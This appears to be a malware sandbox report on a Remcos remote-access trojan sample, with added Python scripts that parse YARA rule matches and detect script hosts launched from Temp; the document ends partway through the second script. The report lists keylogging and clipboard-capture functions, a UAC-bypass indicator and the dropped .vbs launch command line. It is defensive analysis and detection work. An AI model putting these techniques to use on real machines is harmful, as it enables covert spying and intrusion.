                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpT

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000000_2_0040A2B8
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\xi0TpAxHGMsm.exeJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B70E
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004168C1
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B70E
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_0040A3E0

                    E-Banking Fraud

                    Source: Yara match | File source: xi0TpAxHGMsm.exe, type: SAMPLE
                    Source: Yara match | File source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: xi0TpAxHGMsm.exe PID: 524, type: MEMORYSTR
                    Source: Yara match | File source: C:\ProgramData\Disk\Disk.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0041C9E2 SystemParametersInfoW, | 0_2_0041C9E2

                    System Summary

                    Source: xi0TpAxHGMsm.exe, type: SAMPLE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: xi0TpAxHGMsm.exe, type: SAMPLE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: xi0TpAxHGMsm.exe, type: SAMPLE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: xi0TpAxHGMsm.exe PID: 524, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle, | 0_2_004132D2
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle, | 0_2_0041BB09
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle, | 0_2_0041BB35
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress, | 0_2_004167B4
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0043E0CC | 0_2_0043E0CC
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0041F0FA | 0_2_0041F0FA
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00454159 | 0_2_00454159
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00438168 | 0_2_00438168
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_004461F0 | 0_2_004461F0
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0043E2FB | 0_2_0043E2FB
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0045332B | 0_2_0045332B
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0042739D | 0_2_0042739D
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_004374E6 | 0_2_004374E6
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0043E558 | 0_2_0043E558
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00438770 | 0_2_00438770
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_004378FE | 0_2_004378FE
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00433946 | 0_2_00433946
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0044D9C9 | 0_2_0044D9C9
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00427A46 | 0_2_00427A46
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0041DB62 | 0_2_0041DB62
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00427BAF | 0_2_00427BAF
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00437D33 | 0_2_00437D33
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00435E5E | 0_2_00435E5E
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00426E0E | 0_2_00426E0E
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0043DE9D | 0_2_0043DE9D
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00413FCA | 0_2_00413FCA
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00436FEA | 0_2_00436FEA
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: String function: 00434E10 appears 54 times
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: String function: 00402093 appears 50 times
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: String function: 00434770 appears 42 times
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: String function: 00401E65 appears 35 times
                    Source: xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe.mui` vs xi0TpAxHGMsm.exe
                    Source: xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.000000000072A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs xi0TpAxHGMsm.exe
                    Source: xi0TpAxHGMsm.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: xi0TpAxHGMsm.exe, type: SAMPLE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: xi0TpAxHGMsm.exe, type: SAMPLE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: xi0TpAxHGMsm.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: xi0TpAxHGMsm.exe PID: 524, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
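The rule rows above repeat the same metadata once per scan context, and the metadata itself is free text in which values contain commas (the Elastic rule's scan_context is "file, memory"; the deadbits Description is several sentences), so a naive split on ", " corrupts it. The script below is an added example, not part of the Joe Sandbox report: it parses rows written in the report's format with the source and rule columns separated by " | " (a constructed rendering of the rows above), splits the metadata only at real key = value boundaries, and summarises which scan contexts each rule fired in.

```python
"""Parse 'Matched rule' rows into structured records and summarise which scan
contexts (file, unpacked PE, memory) each YARA rule fired in.

Added example; not part of the Joe Sandbox report. ROWS are the report's rows
above, written here in constructed form with the source and rule columns
separated by ' | '. Rule metadata is free text whose values can contain
commas, so it must not be split on ', ' alone."""
import re
from collections import defaultdict

ROWS = [
    "Source: xi0TpAxHGMsm.exe, type: SAMPLE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23",
    "Source: xi0TpAxHGMsm.exe, type: SAMPLE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda",
    "Source: xi0TpAxHGMsm.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)",
    "Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23",
    "Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)",
    "Source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23",
    "Source: Process Memory Space: xi0TpAxHGMsm.exe PID: 524, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown",
]

ROW_RE = re.compile(
    r"^Source: (?P<source>.+?), type: (?P<type>\w+) \| Matched rule: (?P<rule>\S+)(?: (?P<meta>.*))?$")
# Split only at ', ' that is followed by a metadata key and ' = ', so values
# such as 'scan_context = file, memory' and the long Description stay intact.
META_SPLIT = re.compile(r",\s+(?=[A-Za-z_]\w*\s*=\s)")


def parse_meta(text):
    """Turn 'k1 = v1, k2 = v2, ...' into a dict; chunks without ' = ' are ignored."""
    meta = {}
    for chunk in META_SPLIT.split(text or ""):
        key, sep, value = chunk.partition(" = ")
        if sep:
            meta[key.strip()] = value.strip()
    return meta


def parse_row(row):
    """Return {'source', 'type', 'rule', 'meta'} for one Matched rule row."""
    m = ROW_RE.match(row)
    if not m:
        raise ValueError(f"not a Matched rule row: {row[:60]}")
    rec = m.groupdict()
    rec["meta"] = parse_meta(rec.pop("meta"))
    return rec


def summarise(rows):
    """Map rule name -> sorted list of scan-context types it matched in."""
    hits = defaultdict(set)
    for rec in map(parse_row, rows):
        hits[rec["rule"]].add(rec["type"])
    return {rule: sorted(types) for rule, types in hits.items()}


if __name__ == "__main__":
    for rule, types in summarise(ROWS).items():
        print(f"{rule}: {', '.join(types)}")
    print(parse_row(ROWS[0])["meta"]["scan_context"])
```

The summary shows what the repeated rows only imply: the Elastic Remcos signature fires on the file, the unpacked PE and the process memory, so it survives the sample's runtime state, while the CMSTP UAC-bypass indicator fires on file and unpacked PE only.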
                    Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@3/3@2/2
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 0_2_00417952
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle, | 0_2_0040F474
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource, | 0_2_0041B4A8
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, | 0_2_0041AA4A
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-4QQORA
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | File created: C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs"
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: Software\ | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: Rmc-4QQORA | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: Exe | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: Exe | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: Rmc-4QQORA | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: Inj | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: Inj | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: Pj | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: Pj | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: Pj | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: 8SG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: Pj | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: exepath | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: 8SG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: exepath | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: Pj | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: licence | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: dMG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: PSG | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: Administrator | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: User | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: del | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: del | 0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Command line argument: del | 0_2_0040E9C5
                    Source: xi0TpAxHGMsm.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Users\user\Desktop\xi0TpAxHGMsm.exe "C:\Users\user\Desktop\xi0TpAxHGMsm.exe"
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs"
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs"
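The process rows above show the detectable shape of this dropper: an executable in a user profile folder writes a .vbs into the user's Temp directory and launches the script host on it. The script below is an added example, not part of the Joe Sandbox report: detection logic for that pattern run over constructed process-creation records using Sysmon Event ID 1 field names (Image, CommandLine, ParentImage). The first record mirrors the report's wscript launch, the other two are controls; the field names, folder lists and the function names are this example's assumptions. One detail worth noticing in the report's row is that the executed image is C:\Windows\SysWOW64\wscript.exe while the command line names System32: the 32-bit parent is redirected to the 32-bit script host, so matching on the directory would miss it.

```python
"""Detect a script host (wscript.exe / cscript.exe) launched with a script
from a user-writable folder, the pattern in the process rows above.

Added example; not part of the Joe Sandbox report. EVENTS are constructed
process-creation records in Sysmon Event ID 1 field names; the first mirrors
the report's wscript launch, the others are controls. The field names,
directory lists and thresholds are this example's own assumptions."""
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}
# Folders an unprivileged user can write to; compared case-insensitively.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\programdata\\", "\\users\\public\\", "\\windows\\temp\\")
SYSTEM_PARENTS = ("c:\\windows\\", "c:\\program files")

EVENTS = [
    {   # from the report: 32-bit dropper on the Desktop starts the 32-bit script host
        "Image": "C:\\Windows\\SysWOW64\\wscript.exe",
        "CommandLine": '"C:\\Windows\\System32\\WScript.exe" '
                       '"C:\\Users\\user~1\\AppData\\Local\\Temp\\yghndvikdwwpc.vbs"',
        "ParentImage": "C:\\Users\\user\\Desktop\\xi0TpAxHGMsm.exe",
    },
    {   # control: maintenance script under Program Files, started by Explorer
        "Image": "C:\\Windows\\System32\\wscript.exe",
        "CommandLine": '"C:\\Windows\\System32\\wscript.exe" "C:\\Program Files\\Vendor\\maint.vbs"',
        "ParentImage": "C:\\Windows\\explorer.exe",
    },
    {   # control: not a script host at all, even though a .vbs is on the command line
        "Image": "C:\\Windows\\System32\\notepad.exe",
        "CommandLine": "notepad.exe C:\\Users\\user\\AppData\\Local\\Temp\\notes.vbs",
        "ParentImage": "C:\\Windows\\explorer.exe",
    },
]


def split_cmdline(cmdline):
    """Split a Windows command line, keeping quoted arguments with spaces whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def detect_script_dropper(event):
    """Return a list of reasons if the event is a suspicious script-host launch,
    else None. Matches on the image file name, not its directory: a 32-bit
    parent gets SysWOW64\\wscript.exe even when the command line says System32."""
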